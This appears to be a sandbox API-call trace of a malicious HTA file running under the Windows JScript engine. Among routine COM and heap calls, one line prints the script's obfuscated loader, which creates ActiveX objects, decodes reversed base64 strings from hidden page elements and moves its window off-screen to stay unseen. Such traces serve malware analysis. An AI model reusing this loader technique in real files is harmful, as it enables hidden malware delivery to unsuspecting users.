[0082.708] JScriptEngine5:IClassFactory:CreateInstance (in: This=0x5f13c0, pUnkOuter=0x0, riid=0x39f3a0*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppvObject=0x39e9e0 | out: ppvObject=0x39e9e0*=0x29b0488) returned 0x0
[0082.708] ??2@YAPAXI@Z () returned 0x29b0488
[0082.708] GetUserDefaultLCID () returned 0x409
[0082.708] GetACP () returned 0x4e4
[0082.709] JScriptEngine5:IUnknown:AddRef (This=0x29b0488) returned 0x2
[0082.709] JScriptEngine5:IUnknown:Release (This=0x29b0488) returned 0x1
[0082.709] JScriptEngine5:IUnknown:Release (This=0x5f13c0) returned 0x0
[0082.709] ??3@YAXPAX@Z () returned 0x1
[0082.709] JScriptEngine5:IUnknown:QueryInterface (in: This=0x29b0488, riid=0x739c95b4*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppvObject=0x39f6cc | out: ppvObject=0x39f6cc*=0x29b0488) returned 0x0
[0082.709] JScriptEngine5:IUnknown:Release (This=0x29b0488) returned 0x1
[0082.709] IUnknown:AddRef (This=0x13c184) returned 0x4
[0082.709] IInternetSecurityManager:MapUrlToZone (in: This=0x73da96bc, pwszUrl="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", pdwZone=0x39f63c, dwFlags=0x0 | out: pdwZone=0x39f63c*=0xffffffff) returned 0x800c0011
[0082.709] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0082.709] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0082.709] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0082.709] IInternetSecurityManager:ProcessUrlAction (in: This=0x73da96bc, pwszUrl="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", dwAction=0x1401, pPolicy=0x39f640, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x39f640*=0x0) returned 0x0
[0082.709] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0082.709] IUnknown:Release (This=0x13c184) returned 0x3
[0082.709] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x54) returned 0x165a08
[0082.710] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x10) returned 0x16a278
[0082.710] GetCurrentThreadId () returned 0xe84
[0082.710] ??2@YAPAXI@Z () returned 0x5f13c0
[0082.710] GetCurrentThreadId () returned 0xe84
[0082.710] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\COM3", ulOptions=0x0, samDesired=0x20019, phkResult=0x39f568 | out: phkResult=0x39f568*=0x22c) returned 0x0
[0082.710] GetProcAddress (hModule=0x76c20000, lpProcName="RegQueryValueExA") returned 0x76c348ef
[0082.710] RegQueryValueExA (in: hKey=0x22c, lpValueName="COM+Enabled", lpReserved=0x0, lpType=0x39f55c, lpData=0x39f560, lpcbData=0x39f564*=0x4 | out: lpType=0x39f55c*=0x4, lpData=0x39f560*=0x1, lpcbData=0x39f564*=0x4) returned 0x0
[0082.710] GetProcAddress (hModule=0x76c20000, lpProcName="RegCloseKey") returned 0x76c3469d
[0082.710] RegCloseKey (hKey=0x22c) returned 0x0
[0082.711] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76e80000
[0082.711] GetProcAddress (hModule=0x76e80000, lpProcName="CoGetObjectContext") returned 0x76ec632b
[0082.711] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x76e80000
[0082.711] GetProcAddress (hModule=0x76e80000, lpProcName="CoCreateInstance") returned 0x76ec9d0b
[0082.711] CoCreateInstance (in: rclsid=0x663b23a8*(Data1=0x323, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x663b23b8*(Data1=0x146, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x39f564 | out: ppv=0x39f564*=0x76fc6460) returned 0x0
[0082.711] ??2@YAPAXI@Z () returned 0x5ffe40
[0082.711] ??_U@YAPAXI@Z () returned 0x5f13f8
[0082.711] ??2@YAPAXI@Z () returned 0x5ffed0
[0082.712] ??2@YAPAXI@Z () returned 0x29b06a0
[0082.712] ??2@YAPAXI@Z () returned 0x5fff08
[0082.712] GetCurrentThreadId () returned 0xe84
[0082.712] GetEnvironmentVariableW (in: lpName="JS_PROFILER", lpBuffer=0x39f508, nSize=0x27 | out: lpBuffer="") returned 0x0
[0082.712] GetCurrentThreadId () returned 0xe84
[0082.712] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1
[0082.713] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x39f578, cchData=6 | out: lpLCData="1252") returned 5
[0082.713] IsValidCodePage (CodePage=0x4e4) returned 1
[0082.713] GetCurrentThreadId () returned 0xe84
[0082.713] GetCurrentThreadId () returned 0xe84
[0082.713] CoCreateInstance (in: rclsid=0x663b15ec*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x663b15fc*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x29b0674 | out: ppv=0x29b0674*=0x1742d0) returned 0x0
[0082.713] IUnknown:AddRef (This=0x1742d0) returned 0x2
[0082.713] GetCurrentProcessId () returned 0xe80
[0082.713] GetCurrentThreadId () returned 0xe84
[0082.713] GetTickCount () returned 0x1445475
[0082.713] ISystemDebugEventFire:BeginSession (This=0x1742d0, guidSourceID=0x663b16d4, strSessionName="JScript:00003712:00003716:21255285") returned 0x0
[0082.713] GetCurrentThreadId () returned 0xe84
[0082.713] GetCurrentThreadId () returned 0xe84
[0082.714] ??2@YAPAXI@Z () returned 0x5fff70
[0082.714] GetCurrentThreadId () returned 0xe84
[0082.714] StrCmpICW (pszStr1="window", pszStr2="window") returned 0
[0082.714] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x14) returned 0x163d00
[0082.714] CoGetObjectContext (in: riid=0x663b0270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x39f4d4 | out: ppv=0x39f4d4*=0x1369d0) returned 0x0
[0082.714] ??2@YAPAXI@Z () returned 0x5fffa8
[0082.714] StdGlobalInterfaceTable:IGlobalInterfaceTable:RegisterInterfaceInGlobal (in: This=0x76fc6460, pUnk=0x5fffa8, riid=0x663b5710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pdwCookie=0x5fffc4 | out: pdwCookie=0x5fffc4*=0x100) returned 0x0
[0082.714] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x5fffa8, riid=0x76eb97c4*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x39f458 | out: ppvObject=0x39f458*=0x0) returned 0x80004002
[0082.714] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x5fffa8, riid=0x76ec3e0c*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x39f448 | out: ppvObject=0x39f448*=0x0) returned 0x80004002
[0082.714] StdGlobalInterfaceTable:IUnknown:AddRef (This=0x5fffa8) returned 0x2
[0082.714] IUnknown:AddRef (This=0x1369d0) returned 0x2
[0082.714] IUnknown:Release (This=0x1369d0) returned 0x1
[0082.714] ??2@YAPAXI@Z () returned 0x29b0998
[0082.715] GetTickCount () returned 0x1445475
[0082.715] ??2@YAPAXI@Z () returned 0x29b0fe8
[0082.715] malloc (_Size=0x40) returned 0x29b1058
[0082.715] malloc (_Size=0x104) returned 0x29b10a0
[0082.715] ??2@YAPAXI@Z () returned 0x29b11b0
[0082.715] CoGetObjectContext (in: riid=0x663b0270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x39f4f0 | out: ppv=0x39f4f0*=0x1369d0) returned 0x0
[0082.715] IUnknown:Release (This=0x1369d0) returned 0x1
[0082.715] CoGetObjectContext (in: riid=0x663b0270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x39f4f0 | out: ppv=0x39f4f0*=0x1369d0) returned 0x0
[0082.715] IUnknown:Release (This=0x1369d0) returned 0x1
[0082.715] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x10) returned 0x16a290
[0082.715] GetCurrentThreadId () returned 0xe84
[0082.715] GetProcAddress (hModule=0x757f0000, lpProcName=0x2) returned 0x757f4642
[0082.715] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x30) returned 0x166e28
[0082.716] StrCmpIW (psz1="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", psz2="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta") returned 0
[0082.716] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x10) returned 0x178b50
[0082.716] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x20) returned 0x16dbb0
[0082.716] GetCurrentThreadId () returned 0xe84
[0082.716] realloc (_Block=0x0, _Size=0xc8) returned 0x29b11d0
[0082.716] _wcsicmp (_String1="", _String2="") returned 0
[0082.717] SysStringLen (param_1="function centerAsusSuper(i9I9Table){return(new ActiveXObject(i9I9Table));}function cardI9Processor(i9VideoMouse){return(tableNotebook.getElementById(i9VideoMouse).innerHTML);}function i7ProcessorCard(processorAsus){return('cha' + processorAsus);}function tableI9I9(processorMonitorSuper){var notebookProcessor = cardI9Processor('notebookGigabyteGigabyte');var videoSuper = \"\";var superProcessorI9, cardKeyboard, computerComputerSuper;var notebookMouseComputer, gigabyteTableComputer, processorGigabyte, tableCenter;var cardRtxCard = 0;processorMonitorSuper = processorMonitorSuper.replace(/[^A-Za-z0-9\\+\\/\\=]/g, \"\");while(cardRtxCard < processorMonitorSuper.length){notebookMouseComputer = notebookProcessor.indexOf(processorMonitorSuper.charAt(cardRtxCard++));gigabyteTableComputer = notebookProcessor.indexOf(processorMonitorSuper.charAt(cardRtxCard++));processorGigabyte = notebookProcessor.indexOf(processorMonitorSuper.charAt(cardRtxCard++));tableCenter = notebookProcessor.indexOf(processorMonitorSuper.charAt(cardRtxCard++));superProcessorI9 = (notebookMouseComputer << 2) | (gigabyteTableComputer >> 4);cardKeyboard = ((gigabyteTableComputer & 15) << 4) | (processorGigabyte >> 2);computerComputerSuper = ((processorGigabyte & 3) << 6) | tableCenter;videoSuper = videoSuper + String.fromCharCode(superProcessorI9);if(processorGigabyte != 64){videoSuper = videoSuper + String.fromCharCode(cardKeyboard);}if(tableCenter != 64){videoSuper = videoSuper + String.fromCharCode(computerComputerSuper);}}return(videoSuper);}function i7AsusVideo(i7Processor){return i7Processor.split('').reverse().join('');}function monitorMonitorRtx(processorAsus){return(i7AsusVideo(tableI9I9(processorAsus)));}function asusProcessorMonitor(processorAsus, centerNotebook){return(processorAsus.split(centerNotebook));}cardTableMonitor = window;tableNotebook = document;cardTableMonitor['moveTo'](-101, -102);var tableRtx = cardI9Processor('rtxI7').split(\"---\");var cardComputerMonitor = monitorMonitorRtx(tableRtx[0]);var rtxI7Super = monitorMonitorRtx(tableRtx[1]);") returned 0x802
[0082.717] ??2@YAPAXI@Z () returned 0x29b12a0
[0082.717] malloc (_Size=0x804) returned 0x29b12c8
[0082.717] ??2@YAPAXI@Z () returned 0x29b1ad8
[0082.717] malloc (_Size=0x104) returned 0x29b1c40
[0082.717] malloc (_Size=0x204) returned 0x29b1d50
[0082.717] malloc (_Size=0x404) returned 0x29b1f60
[0082.718] malloc (_Size=0x1004) returned 0x29b2370
[0082.718] malloc (_Size=0x804) returned 0x29b3380
[0082.880] malloc (_Size=0x104) returned 0x29b3b90
[0082.880] realloc (_Block=0x0, _Size=0x64) returned 0x29b3ca0
[0082.881] realloc (_Block=0x0, _Size=0x64) returned 0x29b3d10
[0082.881] free (_Block=0x29b3d10)
[0082.881] free (_Block=0x29b3ca0)
[0082.881] free (_Block=0x29b3b90)
[0082.882] malloc (_Size=0x1004) returned 0x29b3b90
[0082.939] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x28) returned 0x152a28
[0082.940] GetCurrentThreadId () returned 0xe84
[0082.940] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x24) returned 0x152a58
[0082.941] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0082.941] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x40) returned 0x174318
[0082.941] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x128) returned 0x179f50
[0082.941] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0082.941] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x30) returned 0x166e60
[0082.941] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x30c) returned 0x17a080
[0082.941] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x18) returned 0x163da0
[0082.941] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x18) returned 0x163dc0
[0082.942] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x18) returned 0x163de0
[0082.942] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x18) returned 0x163e00
[0082.942] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x18) returned 0x163e20
[0082.942] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x18) returned 0x163e40
[0082.942] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x18) returned 0x163e60
[0082.942] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x18) returned 0x163e80
[0082.942] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x18) returned 0x163ea0
[0082.942] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x18) returned 0x163ec0
[0082.942] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x18) returned 0x163ee0
[0082.942] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x18) returned 0x17a3b0
[0082.942] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x10) returned 0x178b68
[0082.942] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x10) returned 0x178b80
[0082.942] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x10) returned 0x178b98
[0082.942] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0082.942] IsCharSpaceW (wch=0x4e) returned 0
[0082.942] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0082.942] IsCharSpaceW (wch=0x4e) returned 0
[0082.943] malloc (_Size=0x2004) returned 0x29b4ba0
[0082.944] ??3@YAXPAX@Z () returned 0x1
[0082.944] malloc (_Size=0x40) returned 0x29b1ad8
[0082.944] realloc (_Block=0x29b1ad8, _Size=0x60) returned 0x29b1ad8
[0082.944] realloc (_Block=0x29b1ad8, _Size=0x90) returned 0x29b1ad8
[0082.944] realloc (_Block=0x29b1ad8, _Size=0xd8) returned 0x29b1ad8
[0082.944] realloc (_Block=0x29b1ad8, _Size=0x140) returned 0x29b1ad8
[0082.945] malloc (_Size=0x1dec) returned 0x29b6bb0
[0082.947] ??2@YAPAXI@Z () returned 0x5fffd0
[0082.948] free (_Block=0x29b2370)
[0082.948] free (_Block=0x29b12c8)
[0082.948] ??3@YAXPAX@Z () returned 0x1
[0082.948] free (_Block=0x29b1ad8)
[0082.949] free (_Block=0x29b4ba0)
[0082.949] free (_Block=0x29b3b90)
[0082.949] free (_Block=0x29b3380)
[0082.949] free (_Block=0x29b1f60)
[0082.949] free (_Block=0x29b1d50)
[0082.950] free (_Block=0x29b1c40)
[0082.950] ??2@YAPAXI@Z () returned 0x29b89a8
[0082.950] ??2@YAPAXI@Z () returned 0x29b89e0
[0082.950] malloc (_Size=0xc) returned 0x29b8a00
[0082.950] ??2@YAPAXI@Z () returned 0x29b8a18
[0082.951] CoGetObjectContext (in: riid=0x663b0270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x39f610 | out: ppv=0x39f610*=0x1369d0) returned 0x0
[0082.951] IUnknown:Release (This=0x1369d0) returned 0x1
[0082.951] ??2@YAPAXI@Z () returned 0x29b8a60
[0082.951] CoGetObjectContext (in: riid=0x663b0270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x39f660 | out: ppv=0x39f660*=0x1369d0) returned 0x0
[0082.951] IUnknown:Release (This=0x1369d0) returned 0x1
[0082.951] ??2@YAPAXI@Z () returned 0x29b8ad0
[0082.952] ISystemDebugEventFire:IsActive (This=0x1742d0) returned 0x1
[0082.952] CoGetObjectContext (in: riid=0x663b0270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x39f65c | out: ppv=0x39f65c*=0x1369d0) returned 0x0
[0082.952] IUnknown:Release (This=0x1369d0) returned 0x1
[0082.953] malloc (_Size=0x658) returned 0x29b8b50
[0082.953] GetCurrentThreadId () returned 0xe84
[0082.988] GetCurrentThreadId () returned 0xe84
[0082.988] ??2@YAPAXI@Z () returned 0x29b91b0
[0082.988] ??2@YAPAXI@Z () returned 0x29b9230
[0082.988] ??2@YAPAXI@Z () returned 0x29b92b0
[0082.988] malloc (_Size=0x204) returned 0x29b9330
[0082.988] ??2@YAPAXI@Z () returned 0x29b9540
[0082.989] ??2@YAPAXI@Z () returned 0x29b95c0
[0082.989] ??2@YAPAXI@Z () returned 0x29b9640
[0082.989] ??2@YAPAXI@Z () returned 0x29b96c0
[0082.989] GetCurrentThreadId () returned 0xe84
[0082.990] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0082.990] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0082.990] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0082.990] IsCharSpaceW (wch=0x74) returned 0
[0082.990] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0082.990] IsCharSpaceW (wch=0x74) returned 0
[0082.990] GetCurrentThreadId () returned 0xe84
[0082.991] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0082.991] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0082.991] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0082.991] IsCharSpaceW (wch=0x63) returned 0
[0082.991] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0082.991] IsCharSpaceW (wch=0x63) returned 0
[0082.991] malloc (_Size=0x404) returned 0x29b9740
[0082.991] GetCurrentThreadId () returned 0xe84
[0082.992] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0082.992] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0082.992] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0082.992] IsCharSpaceW (wch=0x72) returned 0
[0082.992] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0082.992] IsCharSpaceW (wch=0x72) returned 0
[0082.992] realloc (_Block=0x0, _Size=0x50) returned 0x29b9b50
[0082.992] GetCurrentThreadId () returned 0xe84
[0082.993] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0082.993] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0082.993] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0082.993] IsCharSpaceW (wch=0x63) returned 0
[0082.993] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0082.993] IsCharSpaceW (wch=0x63) returned 0
[0082.993] GetCurrentThreadId () returned 0xe84
[0082.993] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0082.994] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0082.994] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0082.994] IsCharSpaceW (wch=0x74) returned 0
[0082.994] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0082.994] IsCharSpaceW (wch=0x74) returned 0
[0082.994] GetCurrentThreadId () returned 0xe84
[0082.994] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0082.994] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0082.995] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x40) returned 0x174360
[0082.995] ??2@YAPAXI@Z () returned 0x29b9ba8
[0082.995] GetCurrentThreadId () returned 0xe84
[0082.995] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0082.995] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x40) returned 0x1743a8
[0082.995] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x28) returned 0x152a88
[0082.995] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x14) returned 0x17a3d0
[0082.996] GetCurrentThreadId () returned 0xe84
[0082.996] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0082.996] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0082.996] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0082.997] IsWindow (hWnd=0x20314) returned 1
[0082.997] IsWindowVisible (hWnd=0x20314) returned 0
[0083.089] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0083.089] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0083.089] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0083.089] IsCharSpaceW (wch=0x67) returned 0
[0083.089] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0083.141] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x40) returned 0x1743f0
[0083.141] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0083.141] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0083.141] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0083.142] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x28) returned 0x152ab8
[0083.142] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0083.142] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0083.142] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x40) returned 0x174438
[0083.142] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0083.159] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x14) returned 0x17a3f0
[0083.159] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x800) returned 0x17ab98
[0083.159] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x800) returned 0x17b3a0
[0083.179] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0xc) returned 0x178bb0
[0083.179] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x64) returned 0x154780
[0083.180] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0xec) returned 0x17bba8
[0083.180] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0xa) returned 0x178bc8
[0083.180] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x40) returned 0x174480
[0083.181] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x64) returned 0x1547f0
[0083.181] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x60) returned 0x151370
[0083.181] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x14) returned 0x17a410
[0083.181] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x40) returned 0x1744c8
[0083.181] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0xa) returned 0x178be0
[0083.181] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x178bc8 | out: hHeap=0x110000) returned 1
[0083.181] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x174480 | out: hHeap=0x110000) returned 1
[0083.181] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0xec) returned 0x17bca0
[0083.182] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0083.182] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0083.202] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0xa) returned 0x178bc8
[0083.202] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x40) returned 0x174480
[0083.202] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x14) returned 0x17a430
[0083.202] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x40) returned 0x174510
[0083.202] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0xa) returned 0x178bf8
[0083.203] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x806) returned 0x17be90
[0083.203] GetProcAddress (hModule=0x757f0000, lpProcName=0x4) returned 0x757f45d2
[0083.203] ??2@YAPAXI@Z () returned 0x29b9be0
[0083.204] ??2@YAPAXI@Z () returned 0x29b9c50
[0083.204] ??2@YAPAXI@Z () returned 0x29b9ca8
[0083.204] ??2@YAPAXI@Z () returned 0x29b9cf8
[0083.204] malloc (_Size=0x40) returned 0x29b9d68
[0083.204] malloc (_Size=0x104) returned 0x29b9db0
[0083.204] ??2@YAPAXI@Z () returned 0x29b9ec0
[0083.204] ??2@YAPAXI@Z () returned 0x29b9f28
[0083.204] malloc (_Size=0x40) returned 0x29b9f98
[0083.205] malloc (_Size=0x104) returned 0x29b12a0
[0083.205] ??2@YAPAXI@Z () returned 0x29b13b0
[0083.205] ??2@YAPAXI@Z () returned 0x29b1420
[0083.205] ??2@YAPAXI@Z () returned 0x29b1468
[0083.206] ??2@YAPAXI@Z () returned 0x29b14b0
[0083.206] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0083.206] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0083.206] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0083.206] IsCharSpaceW (wch=0x67) returned 0
[0083.206] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0083.206] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0083.206] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
